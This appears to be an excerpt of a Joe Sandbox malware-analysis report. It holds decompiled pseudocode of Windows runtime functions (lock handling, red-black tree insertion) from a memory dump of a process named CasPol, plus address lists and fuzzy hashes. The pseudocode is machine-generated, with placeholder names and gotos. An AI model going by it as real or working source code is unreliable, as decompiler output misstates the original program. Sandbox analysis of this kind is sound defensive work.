                                                                							goto L62;
                                                                						}
                                                                						L3:
                                                                						_t227 = _v75;
                                                                						L4:
                                                                						_t240 = 0;
                                                                						_v56 = 0;
                                                                						_t252 = _t130 & 0x00000100;
                                                                						if(_t252 != 0 || _t227 != 0) {
                                                                							_t240 = _v68;
                                                                							_t132 = E01652EB0(_t240);
                                                                							__eflags = _t132 - 2;
                                                                							if(_t132 != 2) {
                                                                								__eflags = _t132 - 1;
                                                                								if(_t132 == 1) {
                                                                									goto L25;
                                                                								}
                                                                								__eflags = _t132 - 6;
                                                                								if(_t132 == 6) {
                                                                									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                										goto L40;
                                                                									}
                                                                									_t197 = E01652EB0(_t240 + 8);
                                                                									__eflags = _t197 - 2;
                                                                									if(_t197 == 2) {
                                                                										goto L25;
                                                                									}
                                                                								}
                                                                								L40:
                                                                								_t133 = 1;
                                                                								L26:
                                                                								_t228 = _v75;
                                                                								_v56 = _t240;
                                                                								__eflags = _t133;
                                                                								if(_t133 != 0) {
                                                                									__eflags = _t228;
                                                                									if(_t228 == 0) {
                                                                										L43:
                                                                										__eflags = _v72;
                                                                										if(_v72 == 0) {
                                                                											goto L8;
                                                                										}
                                                                										goto L69;
                                                                									}
                                                                									_t133 = E016258EC(_t240);
                                                                									_t221 =  *0x1715cac; // 0x16
                                                                									__eflags = _t221 & 0x00000040;
                                                                									if((_t221 & 0x00000040) != 0) {
                                                                										_t228 = 0;
                                                                										__eflags = _t252;
                                                                										if(_t252 != 0) {
                                                                											goto L43;
                                                                										}
                                                                										_t133 = _v72;
                                                                										goto L7;
                                                                									}
                                                                									goto L43;
                                                                								} else {
                                                                									_t133 = _v72;
                                                                									goto L6;
                                                                								}
                                                                							}
                                                                							L25:
                                                                							_t133 = _v73;
                                                                							goto L26;
                                                                						} else {
                                                                							L6:
                                                                							_t221 =  *0x1715cac; // 0x16
                                                                							L7:
                                                                							if(_t133 != 0) {
                                                                								__eflags = _t133 & 0x00001000;
                                                                								if((_t133 & 0x00001000) != 0) {
                                                                									_t133 = _t133 | 0x00000a00;
                                                                									__eflags = _t221 & 0x00000004;
                                                                									if((_t221 & 0x00000004) != 0) {
                                                                										_t133 = _t133 | 0x00000400;
                                                                									}
                                                                								}
                                                                								__eflags = _t228;
                                                                								if(_t228 != 0) {
                                                                									_t133 = _t133 | 0x00000100;
                                                                								}
                                                                								_t229 = E01664A2C(0x1716e40, 0x1664b30, _t133, _t240);
                                                                								__eflags = _t229;
                                                                								if(_t229 == 0) {
                                                                									_t202 = _a20;
                                                                									goto L100;
                                                                								} else {
                                                                									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                									L15:
                                                                									_t202 = _a20;
                                                                									 *_t202 = _t135;
                                                                									if(_t229 == 0) {
                                                                										L100:
                                                                										 *_a4 = 0;
                                                                										_t137 = _a8;
                                                                										__eflags = _t137;
                                                                										if(_t137 != 0) {
                                                                											 *_t137 = 0;
                                                                										}
                                                                										 *_t202 = 0;
                                                                										_t129 = 0xc0000017;
                                                                										goto L23;
                                                                									} else {
                                                                										_t242 = _a16;
                                                                										if(_t242 != 0) {
                                                                											_t254 = _t229;
                                                                											memcpy(_t242, _t254, 0xd << 2);
                                                                											_t267 = _t267 + 0xc;
                                                                											_t242 = _t254 + 0x1a;
                                                                										}
                                                                										_t205 = _a4;
                                                                										_t25 = _t229 + 0x48; // 0x48
                                                                										 *_t205 = _t25;
                                                                										_t140 = _a8;
                                                                										if(_t140 != 0) {
                                                                											__eflags =  *((char*)(_t267 + 0xa));
                                                                											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                											} else {
                                                                												 *_t140 = 0;
                                                                											}
                                                                										}
                                                                										_t256 = _a12;
                                                                										if(_t256 != 0) {
                                                                											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                										}
                                                                										_t257 =  *_t205;
                                                                										_v48 = 0;
                                                                										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                										_v56 = 0;
                                                                										_v52 = 0;
                                                                										_t144 =  *( *[fs:0x30] + 0x50);
                                                                										if(_t144 != 0) {
                                                                											__eflags =  *_t144;
                                                                											if( *_t144 == 0) {
                                                                												goto L20;
                                                                											}
                                                                											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                											goto L21;
                                                                										} else {
                                                                											L20:
                                                                											_t145 = 0x7ffe0384;
                                                                											L21:
                                                                											if( *_t145 != 0) {
                                                                												_t146 =  *[fs:0x30];
                                                                												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                													_t147 = E01647D50();
                                                                													__eflags = _t147;
                                                                													if(_t147 == 0) {
                                                                														_t148 = 0x7ffe0385;
                                                                													} else {
                                                                														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                													}
                                                                													__eflags =  *_t148 & 0x00000020;
                                                                													if(( *_t148 & 0x00000020) != 0) {
                                                                														_t149 = _v72;
                                                                														__eflags = _t149;
                                                                														if(__eflags == 0) {
                                                                															_t149 = 0x1605c80;
                                                                														}
                                                                														_push(_t149);
                                                                														_push( &_v48);
                                                                														 *((char*)(_t267 + 0xb)) = E0165F6E0(_t198, _t242, _t257, __eflags);
                                                                														_push(_t257);
                                                                														_push( &_v64);
                                                                														_t153 = E0165F6E0(_t198, _t242, _t257, __eflags);
                                                                														__eflags =  *((char*)(_t267 + 0xb));
                                                                														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                															__eflags = _t153;
                                                                															if(_t153 != 0) {
                                                                																__eflags = 0;
                                                                																E016A7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                																L01642400(_t267 + 0x20);
                                                                															}
                                                                															L01642400( &_v64);
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                											_t129 = 0;
                                                                											L23:
                                                                											return _t129;
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                							L8:
                                                                							_t275 = _t240;
                                                                							if(_t275 != 0) {
                                                                								_v73 = 0;
                                                                								_t253 = 0;
                                                                								__eflags = 0;
                                                                								L29:
                                                                								_push(0);
                                                                								_t241 = E01652397(_t240);
                                                                								__eflags = _t241;
                                                                								if(_t241 == 0) {
                                                                									_t229 = 0;
                                                                									L14:
                                                                									_t135 = 0;
                                                                									goto L15;
                                                                								}
                                                                								__eflags =  *((char*)(_t267 + 0xb));
                                                                								 *(_t241 + 0x34) = 1;
                                                                								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                									E01642280(_t134, 0x1718608);
                                                                									__eflags =  *0x1716e48 - _t253; // 0x0
                                                                									if(__eflags != 0) {
                                                                										L48:
                                                                										_t253 = 0;
                                                                										__eflags = 0;
                                                                										L49:
                                                                										E0163FFB0(_t198, _t241, 0x1718608);
                                                                										__eflags = _t253;
                                                                										if(_t253 != 0) {
                                                                											L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                										}
                                                                										goto L31;
                                                                									}
                                                                									 *0x1716e48 = _t241;
                                                                									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                									__eflags = _t253;
                                                                									if(_t253 != 0) {
                                                                										_t57 = _t253 + 0x34;
                                                                										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                										__eflags =  *_t57;
                                                                										if( *_t57 == 0) {
                                                                											goto L49;
                                                                										}
                                                                									}
                                                                									goto L48;
                                                                								}
                                                                								L31:
                                                                								_t229 = _t241;
                                                                								goto L14;
                                                                							}
                                                                							_v73 = 1;
                                                                							_v64 = _t240;
                                                                							asm("lock bts dword [esi], 0x0");
                                                                							if(_t275 < 0) {
                                                                								_t231 =  *0x1718608; // 0x0
                                                                								while(1) {
                                                                									_v60 = _t231;
                                                                									__eflags = _t231 & 0x00000001;
                                                                									if((_t231 & 0x00000001) != 0) {
                                                                										goto L76;
                                                                									}
                                                                									_t73 = _t231 + 1; // 0x1
                                                                									_t210 = _t73;
                                                                									asm("lock cmpxchg [edi], ecx");
                                                                									__eflags = _t231 - _t231;
                                                                									if(_t231 != _t231) {
                                                                										L92:
                                                                										_t133 = E01656B90(_t210,  &_v64);
                                                                										_t262 =  *0x1718608; // 0x0
                                                                										L93:
                                                                										_t231 = _t262;
                                                                										continue;
                                                                									}
                                                                									_t240 = _v56;
                                                                									goto L10;
                                                                									L76:
                                                                									_t169 = E0165E180(_t133);
                                                                									__eflags = _t169;
                                                                									if(_t169 != 0) {
                                                                										_push(0xc000004b);
                                                                										_push(0xffffffff);
                                                                										E016697C0();
                                                                										_t231 = _v68;
                                                                									}
                                                                									_v72 = 0;
                                                                									_v24 =  *( *[fs:0x18] + 0x24);
                                                                									_v16 = 3;
                                                                									_v28 = 0;
                                                                									__eflags = _t231 & 0x00000002;
                                                                									if((_t231 & 0x00000002) == 0) {
                                                                										_v32 =  &_v36;
                                                                										_t174 = _t231 >> 4;
                                                                										__eflags = 1 - _t174;
                                                                										_v20 = _t174;
                                                                										asm("sbb ecx, ecx");
                                                                										_t210 = 3 |  &_v36;
                                                                										__eflags = _t174;
                                                                										if(_t174 == 0) {
                                                                											_v20 = 0xfffffffe;
                                                                										}
                                                                									} else {
                                                                										_v32 = 0;
                                                                										_v20 = 0xffffffff;
                                                                										_v36 = _t231 & 0xfffffff0;
                                                                										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                									}
                                                                									asm("lock cmpxchg [edi], esi");
                                                                									_t262 = _t231;
                                                                									__eflags = _t262 - _t231;
                                                                									if(_t262 != _t231) {
                                                                										goto L92;
                                                                									} else {
                                                                										__eflags = _v72;
                                                                										if(_v72 != 0) {
                                                                											E0166006A(0x1718608, _t210);
                                                                										}
                                                                										__eflags =  *0x7ffe036a - 1;
                                                                										if(__eflags <= 0) {
                                                                											L89:
                                                                											_t133 =  &_v16;
                                                                											asm("lock btr dword [eax], 0x1");
                                                                											if(__eflags >= 0) {
                                                                												goto L93;
                                                                											} else {
                                                                												goto L90;
                                                                											}
                                                                											do {
                                                                												L90:
                                                                												_push(0);
                                                                												_push(0x1718608);
                                                                												E0166B180();
                                                                												_t133 = _v24;
                                                                												__eflags = _t133 & 0x00000004;
                                                                											} while ((_t133 & 0x00000004) == 0);
                                                                											goto L93;
                                                                										} else {
                                                                											_t218 =  *0x1716904; // 0x400
                                                                											__eflags = _t218;
                                                                											if(__eflags == 0) {
                                                                												goto L89;
                                                                											} else {
                                                                												goto L87;
                                                                											}
                                                                											while(1) {
                                                                												L87:
                                                                												__eflags = _v16 & 0x00000002;
                                                                												if(__eflags == 0) {
                                                                													goto L89;
                                                                												}
                                                                												asm("pause");
                                                                												_t218 = _t218 - 1;
                                                                												__eflags = _t218;
                                                                												if(__eflags != 0) {
                                                                													continue;
                                                                												}
                                                                												goto L89;
                                                                											}
                                                                											goto L89;
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                							L10:
                                                                							_t229 =  *0x1716e48; // 0x0
                                                                							_v72 = _t229;
                                                                							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                								E0163FFB0(_t198, _t240, 0x1718608);
                                                                								_t253 = _v76;
                                                                								goto L29;
                                                                							} else {
                                                                								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                								asm("lock cmpxchg [esi], ecx");
                                                                								_t215 = 1;
                                                                								if(1 != 1) {
                                                                									while(1) {
                                                                										_t246 = _t215 & 0x00000006;
                                                                										_t180 = _t215;
                                                                										__eflags = _t246 - 2;
                                                                										_v56 = _t246;
                                                                										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                										asm("lock cmpxchg [edi], esi");
                                                                										_t248 = _v56;
                                                                										__eflags = _t180 - _t215;
                                                                										if(_t180 == _t215) {
                                                                											break;
                                                                										}
                                                                										_t215 = _t180;
                                                                									}
                                                                									__eflags = _t248 - 2;
                                                                									if(_t248 == 2) {
                                                                										__eflags = 0;
                                                                										E016600C2(0x1718608, 0, _t235);
                                                                									}
                                                                									_t229 = _v72;
                                                                								}
                                                                								goto L14;
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				_t227 = 0;
                                                                				_v75 = 0;
                                                                				if(_t128 != 0) {
                                                                					goto L4;
                                                                				}
                                                                				goto L2;
                                                                			}
                                                                0x016959a7
                                                                0x016959a7
                                                                0x00000000
                                                                0x016959a7
                                                                0x0169587d
                                                                0x00000000
                                                                0x0169588b
                                                                0x0169588b
                                                                0x01695890
                                                                0x01695892
                                                                0x01695894
                                                                0x01695899
                                                                0x0169589b
                                                                0x016958a0
                                                                0x016958a0
                                                                0x016958aa
                                                                0x016958b2
                                                                0x016958b6
                                                                0x016958be
                                                                0x016958c6
                                                                0x016958c9
                                                                0x0169590d
                                                                0x01695917
                                                                0x0169591a
                                                                0x0169591c
                                                                0x01695920
                                                                0x01695928
                                                                0x0169592a
                                                                0x0169592c
                                                                0x0169592e
                                                                0x0169592e
                                                                0x016958cb
                                                                0x016958cd
                                                                0x016958d8
                                                                0x016958e0
                                                                0x016958f4
                                                                0x016958fe
                                                                0x016958fe
                                                                0x0169593a
                                                                0x0169593e
                                                                0x01695940
                                                                0x01695942
                                                                0x00000000
                                                                0x01695944
                                                                0x01695944
                                                                0x01695949
                                                                0x0169594e
                                                                0x0169594e
                                                                0x01695953
                                                                0x0169595b
                                                                0x01695976
                                                                0x01695976
                                                                0x0169597a
                                                                0x0169597f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01695981
                                                                0x01695981
                                                                0x01695981
                                                                0x01695983
                                                                0x01695988
                                                                0x0169598d
                                                                0x01695991
                                                                0x01695991
                                                                0x00000000
                                                                0x0169595d
                                                                0x0169595d
                                                                0x01695963
                                                                0x01695965
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01695967
                                                                0x01695967
                                                                0x0169596b
                                                                0x0169596d
                                                                0x00000000
                                                                0x00000000
                                                                0x0169596f
                                                                0x01695971
                                                                0x01695971
                                                                0x01695974
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01695974
                                                                0x00000000
                                                                0x01695967
                                                                0x0169595b
                                                                0x01695942
                                                                0x01695863
                                                                0x01652143
                                                                0x01652143
                                                                0x01652149
                                                                0x0165214f
                                                                0x016522f1
                                                                0x016522f6
                                                                0x00000000
                                                                0x01652173
                                                                0x01652173
                                                                0x0165217d
                                                                0x01652181
                                                                0x01652186
                                                                0x016959ae
                                                                0x016959b2
                                                                0x016959b5
                                                                0x016959b7
                                                                0x016959ba
                                                                0x016959cd
                                                                0x016959d1
                                                                0x016959d5
                                                                0x016959d9
                                                                0x016959db
                                                                0x00000000
                                                                0x00000000
                                                                0x016959dd
                                                                0x016959dd
                                                                0x016959e1
                                                                0x016959e4
                                                                0x016959e7
                                                                0x016959ee
                                                                0x016959ee
                                                                0x016959f3
                                                                0x016959f3
                                                                0x00000000
                                                                0x01652186
                                                                0x0165214f
                                                                0x01652106
                                                                0x01652266
                                                                0x016520d8
                                                                0x016520da
                                                                0x016520e0
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                                                                • Instruction ID: fe53b5f4ff7270c1b711d1a3f2c75ede668cd0dafacbbbe14b9b28f3efacdbca
                                                                • Opcode Fuzzy Hash: 3cd4a08fadf0ef197ed62e6566153dc7af771d09e25ec833b198242e4988c199
                                                                • Instruction Fuzzy Hash: 24F1D135608341DFEB66CB2CCC5076B7BE6AB85364F04891EEE969B381D734D841CB92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 99%
                                                                			E0163B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _t117;
                                                                				signed int _t119;
                                                                				signed int _t120;
                                                                				signed int _t121;
                                                                				signed int _t122;
                                                                				signed int _t123;
                                                                				signed int _t126;
                                                                				signed int _t134;
                                                                				signed int _t139;
                                                                				signed char _t143;
                                                                				signed int _t144;
                                                                				signed int _t146;
                                                                				signed int _t148;
                                                                				signed int* _t150;
                                                                				signed int _t152;
                                                                				signed int _t161;
                                                                				signed char _t165;
                                                                				signed int _t167;
                                                                				signed int _t170;
                                                                				signed int _t174;
                                                                				signed char _t177;
                                                                				signed int _t178;
                                                                				signed int _t181;
                                                                				signed int _t182;
                                                                				signed int _t187;
                                                                				signed int _t190;
                                                                				signed int _t192;
                                                                				signed int _t194;
                                                                				signed int _t196;
                                                                				signed int _t199;
                                                                				signed int _t202;
                                                                				signed int _t208;
                                                                				signed int _t211;
                                                                
                                                                				_t182 = _a16;
                                                                				_t178 = _a8;
                                                                				_t161 = _a4;
                                                                				 *_t182 = 0;
                                                                				 *(_t182 + 4) = 0;
                                                                				_t5 = _t161 + 4; // 0x4
                                                                				_t117 =  *_t5 & 0x00000001;
                                                                				if(_t178 == 0) {
                                                                					 *_t161 = _t182;
                                                                					 *(_t161 + 4) = _t182;
                                                                					if(_t117 != 0) {
                                                                						_t117 = _t182 | 0x00000001;
                                                                						 *(_t161 + 4) = _t117;
                                                                					}
                                                                					 *(_t182 + 8) = 0;
                                                                					goto L43;
                                                                				} else {
                                                                					_t208 = _t182 ^ _t178;
                                                                					_t192 = _t208;
                                                                					if(_t117 == 0) {
                                                                						_t192 = _t182;
                                                                					}
                                                                					_t117 = _a12 & 0x000000ff;
                                                                					 *(_t178 + _t117 * 4) = _t192;
                                                                					if(( *(_t161 + 4) & 0x00000001) == 0) {
                                                                						_t208 = _t178;
                                                                					}
                                                                					 *(_t182 + 8) = _t208 | 0x00000001;
                                                                					if(_a12 == 0) {
                                                                						_t14 = _t161 + 4; // 0x4
                                                                						_t177 =  *_t14;
                                                                						_t117 = _t177 & 0xfffffffe;
                                                                						if(_t178 == _t117) {
                                                                							_t117 = _a4;
                                                                							 *(_t117 + 4) = _t182;
                                                                							if((_t177 & 0x00000001) != 0) {
                                                                								_t161 = _a4;
                                                                								_t117 = _t182 | 0x00000001;
                                                                								 *(_t161 + 4) = _t117;
                                                                							} else {
                                                                								_t161 = _t117;
                                                                							}
                                                                						} else {
                                                                							_t161 = _a4;
                                                                						}
                                                                					}
                                                                					if(( *(_t178 + 8) & 0x00000001) == 0) {
                                                                						L42:
                                                                						L43:
                                                                						return _t117;
                                                                					} else {
                                                                						_t19 = _t161 + 4; // 0x4
                                                                						_t165 =  *_t19 & 0x00000001;
                                                                						do {
                                                                							_t211 =  *(_t178 + 8) & 0xfffffffc;
                                                                							if(_t165 != 0) {
                                                                								if(_t211 != 0) {
                                                                									_t211 = _t211 ^ _t178;
                                                                								}
                                                                							}
                                                                							_t119 =  *_t211;
                                                                							if(_t165 != 0) {
                                                                								if(_t119 != 0) {
                                                                									_t119 = _t119 ^ _t211;
                                                                								}
                                                                							}
                                                                							_t120 = 0;
                                                                							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
                                                                							_v8 = _t121;
                                                                							_t122 = _t121 ^ 0x00000001;
                                                                							_v16 = _t122;
                                                                							_t123 =  *(_t211 + _t122 * 4);
                                                                							if(_t165 != 0) {
                                                                								if(_t123 == 0) {
                                                                									goto L20;
                                                                								}
                                                                								_t123 = _t123 ^ _t211;
                                                                								goto L13;
                                                                							} else {
                                                                								L13:
                                                                								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
                                                                									L20:
                                                                									_t194 = _v16;
                                                                									if((_a12 & 0x000000ff) != _v8) {
                                                                										_t126 =  *(_t182 + 8) & 0xfffffffc;
                                                                										_t167 = _t165 & 1;
                                                                										_v12 = _t167;
                                                                										if(_t167 != 0) {
                                                                											if(_t126 != 0) {
                                                                												_t126 = _t126 ^ _t182;
                                                                											}
                                                                										}
                                                                										if(_t126 != _t178) {
                                                                											L83:
                                                                											_t178 = 0x1d;
                                                                											asm("int 0x29");
                                                                											goto L84;
                                                                										} else {
                                                                											_t126 =  *(_t178 + _t194 * 4);
                                                                											if(_t167 != 0) {
                                                                												if(_t126 != 0) {
                                                                													_t126 = _t126 ^ _t178;
                                                                												}
                                                                											}
                                                                											if(_t126 != _t182) {
                                                                												goto L83;
                                                                											} else {
                                                                												_t126 =  *(_t211 + _v8 * 4);
                                                                												if(_t167 != 0) {
                                                                													if(_t126 != 0) {
                                                                														_t126 = _t126 ^ _t211;
                                                                													}
                                                                												}
                                                                												if(_t126 != _t178) {
                                                                													goto L83;
                                                                												} else {
                                                                													_t77 = _t178 + 8; // 0x8
                                                                													_t150 = _t77;
                                                                													_v20 = _t150;
                                                                													_t126 =  *_t150 & 0xfffffffc;
                                                                													if(_t167 != 0) {
                                                                														if(_t126 != 0) {
                                                                															_t126 = _t126 ^ _t178;
                                                                														}
                                                                													}
                                                                													if(_t126 != _t211) {
                                                                														goto L83;
                                                                													} else {
                                                                														_t202 = _t211 ^ _t182;
                                                                														_t152 = _t202;
                                                                														if(_t167 == 0) {
                                                                															_t152 = _t182;
                                                                														}
                                                                														 *(_t211 + _v8 * 4) = _t152;
                                                                														_t170 = _v12;
                                                                														if(_t170 == 0) {
                                                                															_t202 = _t211;
                                                                														}
                                                                														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
                                                                														_t126 =  *(_t182 + _v8 * 4);
                                                                														if(_t170 != 0) {
                                                                															if(_t126 == 0) {
                                                                																L58:
                                                                																if(_t170 != 0) {
                                                                																	if(_t126 != 0) {
                                                                																		_t126 = _t126 ^ _t178;
                                                                																	}
                                                                																}
                                                                																 *(_t178 + _v16 * 4) = _t126;
                                                                																_t199 = _t178 ^ _t182;
                                                                																if(_t170 != 0) {
                                                                																	_t178 = _t199;
                                                                																}
                                                                																 *(_t182 + _v8 * 4) = _t178;
                                                                																if(_t170 == 0) {
                                                                																	_t199 = _t182;
                                                                																}
                                                                																 *_v20 =  *_v20 & 0x00000003 | _t199;
                                                                																_t178 = _t182;
                                                                																_t167 =  *((intOrPtr*)(_a4 + 4));
                                                                																goto L21;
                                                                															}
                                                                															_t126 = _t126 ^ _t182;
                                                                														}
                                                                														if(_t126 != 0) {
                                                                															_t167 =  *(_t126 + 8);
                                                                															_t194 = _t167 & 0xfffffffc;
                                                                															if(_v12 != 0) {
                                                                																L84:
                                                                																if(_t194 != 0) {
                                                                																	_t194 = _t194 ^ _t126;
                                                                																}
                                                                															}
                                                                															if(_t194 != _t182) {
                                                                																goto L83;
                                                                															}
                                                                															if(_v12 != 0) {
                                                                																_t196 = _t126 ^ _t178;
                                                                															} else {
                                                                																_t196 = _t178;
                                                                															}
                                                                															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
                                                                															_t170 = _v12;
                                                                														}
                                                                														goto L58;
                                                                													}
                                                                												}
                                                                											}
                                                                										}
                                                                									}
                                                                									L21:
                                                                									_t182 = _v8 ^ 0x00000001;
                                                                									_t126 =  *(_t178 + 8) & 0xfffffffc;
                                                                									_v8 = _t182;
                                                                									_t194 = _t167 & 1;
                                                                									if(_t194 != 0) {
                                                                										if(_t126 != 0) {
                                                                											_t126 = _t126 ^ _t178;
                                                                										}
                                                                									}
                                                                									if(_t126 != _t211) {
                                                                										goto L83;
                                                                									} else {
                                                                										_t134 = _t182 ^ 0x00000001;
                                                                										_v16 = _t134;
                                                                										_t126 =  *(_t211 + _t134 * 4);
                                                                										if(_t194 != 0) {
                                                                											if(_t126 != 0) {
                                                                												_t126 = _t126 ^ _t211;
                                                                											}
                                                                										}
                                                                										if(_t126 != _t178) {
                                                                											goto L83;
                                                                										} else {
                                                                											_t167 = _t211 + 8;
                                                                											_t182 =  *_t167 & 0xfffffffc;
                                                                											_v20 = _t167;
                                                                											if(_t194 != 0) {
                                                                												if(_t182 == 0) {
                                                                													L80:
                                                                													_t126 = _a4;
                                                                													if( *_t126 != _t211) {
                                                                														goto L83;
                                                                													}
                                                                													 *_t126 = _t178;
                                                                													L34:
                                                                													if(_t194 != 0) {
                                                                														if(_t182 != 0) {
                                                                															_t182 = _t182 ^ _t178;
                                                                														}
                                                                													}
                                                                													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
                                                                													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
                                                                													if(_t194 != 0) {
                                                                														if(_t139 == 0) {
                                                                															goto L37;
                                                                														}
                                                                														_t126 = _t139 ^ _t178;
                                                                														goto L36;
                                                                													} else {
                                                                														L36:
                                                                														if(_t126 != 0) {
                                                                															_t167 =  *(_t126 + 8);
                                                                															_t182 = _t167 & 0xfffffffc;
                                                                															if(_t194 != 0) {
                                                                																if(_t182 != 0) {
                                                                																	_t182 = _t182 ^ _t126;
                                                                																}
                                                                															}
                                                                															if(_t182 != _t178) {
                                                                																goto L83;
                                                                															} else {
                                                                																if(_t194 != 0) {
                                                                																	_t190 = _t126 ^ _t211;
                                                                																} else {
                                                                																	_t190 = _t211;
                                                                																}
                                                                																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
                                                                																_t167 = _v20;
                                                                																goto L37;
                                                                															}
                                                                														}
                                                                														L37:
                                                                														if(_t194 != 0) {
                                                                															if(_t139 != 0) {
                                                                																_t139 = _t139 ^ _t211;
                                                                															}
                                                                														}
                                                                														 *(_t211 + _v16 * 4) = _t139;
                                                                														_t187 = _t211 ^ _t178;
                                                                														if(_t194 != 0) {
                                                                															_t211 = _t187;
                                                                														}
                                                                														 *(_t178 + _v8 * 4) = _t211;
                                                                														if(_t194 == 0) {
                                                                															_t187 = _t178;
                                                                														}
                                                                														_t143 =  *_t167 & 0x00000003 | _t187;
                                                                														 *_t167 = _t143;
                                                                														_t117 = _t143 | 0x00000001;
                                                                														 *_t167 = _t117;
                                                                														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
                                                                														goto L42;
                                                                													}
                                                                												}
                                                                												_t182 = _t182 ^ _t211;
                                                                											}
                                                                											if(_t182 == 0) {
                                                                												goto L80;
                                                                											}
                                                                											_t144 =  *(_t182 + 4);
                                                                											if(_t194 != 0) {
                                                                												if(_t144 != 0) {
                                                                													_t144 = _t144 ^ _t182;
                                                                												}
                                                                											}
                                                                											if(_t144 == _t211) {
                                                                												if(_t194 != 0) {
                                                                													_t146 = _t182 ^ _t178;
                                                                												} else {
                                                                													_t146 = _t178;
                                                                												}
                                                                												 *(_t182 + 4) = _t146;
                                                                												goto L34;
                                                                											} else {
                                                                												_t126 =  *_t182;
                                                                												if(_t194 != 0) {
                                                                													if(_t126 != 0) {
                                                                														_t126 = _t126 ^ _t182;
                                                                													}
                                                                												}
                                                                												if(_t126 != _t211) {
                                                                													goto L83;
                                                                												} else {
                                                                													if(_t194 != 0) {
                                                                														_t148 = _t182 ^ _t178;
                                                                													} else {
                                                                														_t148 = _t178;
                                                                													}
                                                                													 *_t182 = _t148;
                                                                													goto L34;
                                                                												}
                                                                											}
                                                                										}
                                                                									}
                                                                								} else {
                                                                									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
                                                                									_t182 = _t211;
                                                                									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
                                                                									_t174 = _a4;
                                                                									_t117 =  *(_t211 + 8);
                                                                									_t181 = _t117 & 0xfffffffc;
                                                                									if(( *(_t174 + 4) & 0x00000001) != 0) {
                                                                										if(_t181 == 0) {
                                                                											goto L42;
                                                                										}
                                                                										_t178 = _t181 ^ _t211;
                                                                									}
                                                                									if(_t178 == 0) {
                                                                										goto L42;
                                                                									}
                                                                									goto L17;
                                                                								}
                                                                							}
                                                                							L17:
                                                                							 *(_t211 + 8) = _t117 | 0x00000001;
                                                                							_t40 = _t174 + 4; // 0x4
                                                                							_t117 =  *_t178;
                                                                							_t165 =  *_t40 & 0x00000001;
                                                                							if(_t165 != 0) {
                                                                								if(_t117 != 0) {
                                                                									_t117 = _t117 ^ _t178;
                                                                								}
                                                                							}
                                                                							_a12 = _t211 != _t117;
                                                                						} while (( *(_t178 + 8) & 0x00000001) != 0);
                                                                						goto L42;
                                                                					}
                                                                				}
                                                                			}
                                                                0x0163b1e1
                                                                0x0163b1e6
                                                                0x0163b1e9
                                                                0x0163b1ee
                                                                0x0168a751
                                                                0x0163b409
                                                                0x0163b409
                                                                0x0163b40e
                                                                0x00000000
                                                                0x00000000
                                                                0x0163b410
                                                                0x0163b22d
                                                                0x0163b22f
                                                                0x0168a790
                                                                0x0168a796
                                                                0x0168a796
                                                                0x0168a790
                                                                0x0163b23d
                                                                0x0163b243
                                                                0x0163b248
                                                                0x0168a79f
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a7a5
                                                                0x00000000
                                                                0x0163b24e
                                                                0x0163b24e
                                                                0x0163b250
                                                                0x0163b374
                                                                0x0163b379
                                                                0x0163b37e
                                                                0x0168a7ae
                                                                0x0168a7b4
                                                                0x0168a7b4
                                                                0x0168a7ae
                                                                0x0163b386
                                                                0x00000000
